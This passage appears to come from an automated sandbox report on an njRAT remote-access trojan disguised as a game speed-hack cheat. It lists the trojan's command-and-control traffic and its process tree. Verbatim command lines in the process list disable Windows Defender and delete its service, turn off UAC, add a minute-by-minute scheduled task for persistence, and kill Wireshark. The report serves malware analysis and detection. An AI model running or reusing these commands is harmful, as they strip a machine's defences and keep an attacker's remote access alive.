RT_ICON	0x363b8	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	0.5628048780487804
RT_ICON	0x36a20	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	0.635752688172043
RT_ICON	0x36d08	0x1e8	Device independent bitmap graphic, 24 x 48 x 4, image size 288	0.6598360655737705
RT_ICON	0x36ef0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	0.5878378378378378
RT_ICON	0x37018	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	0.4227078891257996
RT_ICON	0x37ec0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	0.4390794223826715
RT_ICON	0x38768	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	0.4447004608294931
RT_ICON	0x38e30	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	0.34609826589595377
RT_ICON	0x39398	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	0.11003489885247841
RT_ICON	0x49bc0	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	0.1800504519655245
RT_ICON	0x53068	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	0.2140018484288355
RT_ICON	0x584f0	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	0.18345536136041568
RT_ICON	0x5c718	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	0.2721991701244813
RT_ICON	0x5ecc0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	0.3128517823639775
RT_ICON	0x5fd68	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	0.4426229508196721
RT_ICON	0x606f0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	0.5106382978723404
RT_GROUP_ICON	0x60b58	0xe6	data	0.591304347826087
RT_MANIFEST	0x60c40	0x1e7	XML 1.0 document, ASCII text, with CRLF line terminators	0.5338809034907598

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-14T18:28:43.286328+0200	2033132	ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)	1	192.168.2.8	49710	147.185.221.23	6666	TCP
2024-10-14T18:28:43.286328+0200	2021176	ET MALWARE Bladabindi/njRAT CnC Command (ll)	1	192.168.2.8	49710	147.185.221.23	6666	TCP
2024-10-14T18:29:04.855133+0200	2033132	ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)	1	192.168.2.8	49714	147.185.221.23	6666	TCP
2024-10-14T18:29:04.855133+0200	2021176	ET MALWARE Bladabindi/njRAT CnC Command (ll)	1	192.168.2.8	49714	147.185.221.23	6666	TCP
2024-10-14T18:29:28.348189+0200	2033132	ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)	1	192.168.2.8	49715	147.185.221.23	6666	TCP
2024-10-14T18:29:28.348189+0200	2021176	ET MALWARE Bladabindi/njRAT CnC Command (ll)	1	192.168.2.8	49715	147.185.221.23	6666	TCP
2024-10-14T18:30:00.541312+0200	2033132	ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)	1	192.168.2.8	49716	147.185.221.23	6666	TCP
2024-10-14T18:30:00.541312+0200	2021176	ET MALWARE Bladabindi/njRAT CnC Command (ll)	1	192.168.2.8	49716	147.185.221.23	6666	TCP
2024-10-14T18:30:14.767236+0200	2033132	ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)	1	192.168.2.8	49717	147.185.221.23	6666	TCP
2024-10-14T18:30:14.767236+0200	2021176	ET MALWARE Bladabindi/njRAT CnC Command (ll)	1	192.168.2.8	49717	147.185.221.23	6666	TCP
2024-10-14T18:30:38.756634+0200	2033132	ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)	1	192.168.2.8	49718	147.185.221.23	6666	TCP
2024-10-14T18:30:38.756634+0200	2021176	ET MALWARE Bladabindi/njRAT CnC Command (ll)	1	192.168.2.8	49718	147.185.221.23	6666	TCP
2024-10-14T18:31:01.786000+0200	2033132	ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)	1	192.168.2.8	49719	147.185.221.23	6666	TCP
2024-10-14T18:31:01.786000+0200	2021176	ET MALWARE Bladabindi/njRAT CnC Command (ll)	1	192.168.2.8	49719	147.185.221.23	6666	TCP
2024-10-14T18:31:24.973100+0200	2033132	ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)	1	192.168.2.8	49720	147.185.221.23	6666	TCP
2024-10-14T18:31:24.973100+0200	2021176	ET MALWARE Bladabindi/njRAT CnC Command (ll)	1	192.168.2.8	49720	147.185.221.23	6666	TCP
2024-10-14T18:31:48.417530+0200	2033132	ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)	1	192.168.2.8	49721	147.185.221.23	6666	TCP
2024-10-14T18:31:48.417530+0200	2021176	ET MALWARE Bladabindi/njRAT CnC Command (ll)	1	192.168.2.8	49721	147.185.221.23	6666	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 14, 2024 18:28:39.879407883 CEST	49710	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:28:39.884341002 CEST	6666	49710	147.185.221.23	192.168.2.8
Oct 14, 2024 18:28:39.889106989 CEST	49710	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:28:43.286328077 CEST	49710	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:28:43.291356087 CEST	6666	49710	147.185.221.23	192.168.2.8
Oct 14, 2024 18:28:43.293118000 CEST	49710	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:28:43.297975063 CEST	6666	49710	147.185.221.23	192.168.2.8
Oct 14, 2024 18:28:46.404689074 CEST	49710	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:28:46.409686089 CEST	6666	49710	147.185.221.23	192.168.2.8
Oct 14, 2024 18:28:56.474473000 CEST	49710	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:28:56.479496002 CEST	6666	49710	147.185.221.23	192.168.2.8
Oct 14, 2024 18:29:01.286823988 CEST	6666	49710	147.185.221.23	192.168.2.8
Oct 14, 2024 18:29:01.286895037 CEST	49710	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:29:03.305704117 CEST	49710	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:29:03.306915045 CEST	49714	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:29:03.310517073 CEST	6666	49710	147.185.221.23	192.168.2.8
Oct 14, 2024 18:29:03.311809063 CEST	6666	49714	147.185.221.23	192.168.2.8
Oct 14, 2024 18:29:03.311898947 CEST	49714	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:29:04.855133057 CEST	49714	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:29:04.860404015 CEST	6666	49714	147.185.221.23	192.168.2.8
Oct 14, 2024 18:29:04.860462904 CEST	49714	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:29:04.865288973 CEST	6666	49714	147.185.221.23	192.168.2.8
Oct 14, 2024 18:29:06.004687071 CEST	49714	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:29:06.009500980 CEST	6666	49714	147.185.221.23	192.168.2.8
Oct 14, 2024 18:29:24.689439058 CEST	6666	49714	147.185.221.23	192.168.2.8
Oct 14, 2024 18:29:24.689595938 CEST	49714	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:29:27.302561998 CEST	49714	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:29:27.307878017 CEST	6666	49714	147.185.221.23	192.168.2.8
Oct 14, 2024 18:29:27.313674927 CEST	49715	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:29:27.318696022 CEST	6666	49715	147.185.221.23	192.168.2.8
Oct 14, 2024 18:29:27.318783045 CEST	49715	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:29:28.348189116 CEST	49715	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:29:28.353205919 CEST	6666	49715	147.185.221.23	192.168.2.8
Oct 14, 2024 18:29:28.353300095 CEST	49715	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:29:28.358123064 CEST	6666	49715	147.185.221.23	192.168.2.8
Oct 14, 2024 18:29:33.900038004 CEST	49715	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:29:33.906594038 CEST	6666	49715	147.185.221.23	192.168.2.8
Oct 14, 2024 18:29:48.725244999 CEST	6666	49715	147.185.221.23	192.168.2.8
Oct 14, 2024 18:29:48.726655006 CEST	49715	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:29:50.747375965 CEST	49715	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:29:50.752911091 CEST	6666	49715	147.185.221.23	192.168.2.8
Oct 14, 2024 18:29:50.758882999 CEST	49716	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:29:50.763979912 CEST	6666	49716	147.185.221.23	192.168.2.8
Oct 14, 2024 18:29:50.764056921 CEST	49716	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:30:00.541311979 CEST	49716	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:30:00.546488047 CEST	6666	49716	147.185.221.23	192.168.2.8
Oct 14, 2024 18:30:00.546578884 CEST	49716	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:30:00.551573992 CEST	6666	49716	147.185.221.23	192.168.2.8
Oct 14, 2024 18:30:12.128907919 CEST	6666	49716	147.185.221.23	192.168.2.8
Oct 14, 2024 18:30:12.129040003 CEST	49716	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:30:14.202409983 CEST	49716	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:30:14.207918882 CEST	6666	49716	147.185.221.23	192.168.2.8
Oct 14, 2024 18:30:14.379460096 CEST	49717	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:30:14.386264086 CEST	6666	49717	147.185.221.23	192.168.2.8
Oct 14, 2024 18:30:14.386374950 CEST	49717	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:30:14.767235994 CEST	49717	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:30:14.772320986 CEST	6666	49717	147.185.221.23	192.168.2.8
Oct 14, 2024 18:30:14.772412062 CEST	49717	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:30:14.777348995 CEST	6666	49717	147.185.221.23	192.168.2.8
Oct 14, 2024 18:30:20.279592991 CEST	49717	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:30:20.284715891 CEST	6666	49717	147.185.221.23	192.168.2.8
Oct 14, 2024 18:30:28.668324947 CEST	49717	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:30:28.673577070 CEST	6666	49717	147.185.221.23	192.168.2.8
Oct 14, 2024 18:30:35.751203060 CEST	6666	49717	147.185.221.23	192.168.2.8
Oct 14, 2024 18:30:35.751353025 CEST	49717	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:30:37.757571936 CEST	49717	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:30:37.762840033 CEST	6666	49717	147.185.221.23	192.168.2.8
Oct 14, 2024 18:30:37.766979933 CEST	49718	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:30:37.772140026 CEST	6666	49718	147.185.221.23	192.168.2.8
Oct 14, 2024 18:30:37.772366047 CEST	49718	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:30:38.756633997 CEST	49718	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:30:38.761928082 CEST	6666	49718	147.185.221.23	192.168.2.8
Oct 14, 2024 18:30:38.762146950 CEST	49718	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:30:38.767224073 CEST	6666	49718	147.185.221.23	192.168.2.8
Oct 14, 2024 18:30:59.126638889 CEST	6666	49718	147.185.221.23	192.168.2.8
Oct 14, 2024 18:30:59.126909971 CEST	49718	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:31:01.131434917 CEST	49718	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:31:01.132462978 CEST	49719	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:31:01.136554956 CEST	6666	49718	147.185.221.23	192.168.2.8
Oct 14, 2024 18:31:01.137456894 CEST	6666	49719	147.185.221.23	192.168.2.8
Oct 14, 2024 18:31:01.137535095 CEST	49719	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:31:01.786000013 CEST	49719	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:31:01.791134119 CEST	6666	49719	147.185.221.23	192.168.2.8
Oct 14, 2024 18:31:01.791326046 CEST	49719	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:31:01.796329975 CEST	6666	49719	147.185.221.23	192.168.2.8
Oct 14, 2024 18:31:04.244738102 CEST	49719	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:31:04.249862909 CEST	6666	49719	147.185.221.23	192.168.2.8
Oct 14, 2024 18:31:22.535276890 CEST	6666	49719	147.185.221.23	192.168.2.8
Oct 14, 2024 18:31:22.535356045 CEST	49719	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:31:24.536535025 CEST	49719	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:31:24.537826061 CEST	49720	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:31:24.541486025 CEST	6666	49719	147.185.221.23	192.168.2.8
Oct 14, 2024 18:31:24.542757988 CEST	6666	49720	147.185.221.23	192.168.2.8
Oct 14, 2024 18:31:24.542826891 CEST	49720	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:31:24.973099947 CEST	49720	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:31:24.978192091 CEST	6666	49720	147.185.221.23	192.168.2.8
Oct 14, 2024 18:31:24.978276014 CEST	49720	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:31:24.983167887 CEST	6666	49720	147.185.221.23	192.168.2.8
Oct 14, 2024 18:31:29.590816021 CEST	49720	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:31:29.596045017 CEST	6666	49720	147.185.221.23	192.168.2.8
Oct 14, 2024 18:31:45.926332951 CEST	6666	49720	147.185.221.23	192.168.2.8
Oct 14, 2024 18:31:45.926521063 CEST	49720	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:31:47.927083969 CEST	49720	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:31:47.928287983 CEST	49721	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:31:47.932626009 CEST	6666	49720	147.185.221.23	192.168.2.8
Oct 14, 2024 18:31:47.933120966 CEST	6666	49721	147.185.221.23	192.168.2.8
Oct 14, 2024 18:31:47.933193922 CEST	49721	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:31:48.417530060 CEST	49721	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:31:48.422688007 CEST	6666	49721	147.185.221.23	192.168.2.8
Oct 14, 2024 18:31:48.422782898 CEST	49721	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:31:48.427606106 CEST	6666	49721	147.185.221.23	192.168.2.8
Oct 14, 2024 18:31:51.980102062 CEST	49721	6666	192.168.2.8	147.185.221.23
Oct 14, 2024 18:31:51.985152960 CEST	6666	49721	147.185.221.23	192.168.2.8
Oct 14, 2024 18:32:09.299324989 CEST	6666	49721	147.185.221.23	192.168.2.8
Oct 14, 2024 18:32:09.299406052 CEST	49721	6666	192.168.2.8	147.185.221.23

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 14, 2024 18:28:39.795463085 CEST	54192	53	192.168.2.8	1.1.1.1
Oct 14, 2024 18:28:39.809297085 CEST	53	54192	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 14, 2024 18:28:39.795463085 CEST	192.168.2.8	1.1.1.1	0x7bde	Standard query (0)	order-resident.gl.at.ply.gg	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 14, 2024 18:28:39.809297085 CEST	1.1.1.1	192.168.2.8	0x7bde	No error (0)	order-resident.gl.at.ply.gg		147.185.221.23	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	12:27:59
Start date:	14/10/2024
Path:	C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe"
Imagebase:	0x400000
File size:	377'856 bytes
MD5 hash:	65C0F9249F64C65CDA3E5EA32126FC1F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000000.00000002.1507638179.00000000027D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000000.00000002.1507638179.00000000027D1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: njrat1, Description: Identify njRat, Source: 00000000.00000002.1507638179.00000000027D1000.00000004.00000800.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: 00000000.00000002.1507638179.00000000027D1000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	12:27:59
Start date:	14/10/2024
Path:	C:\Windows\System32\dllhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Imagebase:	0x7ff673080000
File size:	21'312 bytes
MD5 hash:	08EB78E5BE019DF044C26B14703BD1FA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:28:07
Start date:	14/10/2024
Path:	C:\ProgramData\dllhost.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\dllhost.exe"
Imagebase:	0x400000
File size:	377'856 bytes
MD5 hash:	65C0F9249F64C65CDA3E5EA32126FC1F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: RevengeRAT_Sep17, Description: Detects RevengeRAT malware, Source: C:\ProgramData\dllhost.exe, Author: Florian Roth
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	12:28:13
Start date:	14/10/2024
Path:	C:\Windows\SysWOW64\attrib.exe
Wow64 process (32bit):	true
Commandline:	attrib +h "C:\ProgramData\dllhost.exe"
Imagebase:	0x470000
File size:	19'456 bytes
MD5 hash:	0E938DD280E83B1596EC6AA48729C2B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	12:28:14
Start date:	14/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	12:28:18
Start date:	14/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	12:28:18
Start date:	14/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	12:28:19
Start date:	14/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell Set-MpPreference -DisableRealtimeMonitoring $true
Imagebase:	0x7e0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	12:28:23
Start date:	14/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c sc query windefend
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	12:28:23
Start date:	14/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	12:28:24
Start date:	14/10/2024
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	sc query windefend
Imagebase:	0x9c0000
File size:	61'440 bytes
MD5 hash:	D9D7684B8431A0D10D0E76FE9F5FFEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	12:28:24
Start date:	14/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c sc stop windefend
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	12:28:24
Start date:	14/10/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff605670000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	12:28:24
Start date:	14/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	12:28:25
Start date:	14/10/2024
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	sc stop windefend
Imagebase:	0x9c0000
File size:	61'440 bytes
MD5 hash:	D9D7684B8431A0D10D0E76FE9F5FFEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	12:28:26
Start date:	14/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c sc delete windefend
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	12:28:26
Start date:	14/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	12:28:26
Start date:	14/10/2024
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	sc delete windefend
Imagebase:	0x9c0000
File size:	61'440 bytes
MD5 hash:	D9D7684B8431A0D10D0E76FE9F5FFEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	12:28:27
Start date:	14/10/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /delete /tn CleanSweepCheck /f
Imagebase:	0xa00000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	12:28:27
Start date:	14/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	12:28:27
Start date:	14/10/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /sc minute /mo 1 /tn CleanSweepCheck /tr C:\ProgramData\dllhost.exe
Imagebase:	0xa00000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	12:28:27
Start date:	14/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	12:28:27
Start date:	14/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	12:28:28
Start date:	14/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	12:28:28
Start date:	14/10/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Imagebase:	0x7c0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	12:28:28
Start date:	14/10/2024
Path:	C:\ProgramData\dllhost.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\dllhost.exe
Imagebase:	0x400000
File size:	377'856 bytes
MD5 hash:	65C0F9249F64C65CDA3E5EA32126FC1F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	12:28:30
Start date:	14/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	12:28:33
Start date:	14/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c taskkill /f /im Wireshark.exe
Imagebase:	0xa40000
File size:	236'544 bytes
